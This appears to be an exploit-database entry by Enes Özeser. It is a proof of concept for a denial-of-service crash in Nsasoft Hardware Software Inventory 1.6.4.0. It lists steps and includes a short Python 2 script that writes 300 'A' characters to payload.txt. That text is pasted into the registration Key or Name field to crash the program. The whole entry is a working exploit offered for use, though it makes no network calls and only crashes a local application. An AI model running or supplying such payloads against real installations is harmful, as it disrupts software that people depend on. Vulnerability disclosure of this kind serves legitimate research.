# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC) # Exploit Author : Enes Özeser # Exploit Date: 2021-02-28 # Vendor Homepage : https://www.nsauditor.com/ # Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe # Version: 1.6.4.0 # Tested on: Windows 10 # Steps: 1- Run the python script. (payload.py) 2- Open payload.txt and copy content to clipboard. 3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'. 4- Register -> Enter Registeration Code 5- Paste clipboard into the "Key" or "Name". 6- Click on OK. 7- Crashed. ---> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 300 try: f = open("payload.txt","w") f.write(buffer) f.close() print "File created!" except: print "File cannot be created!"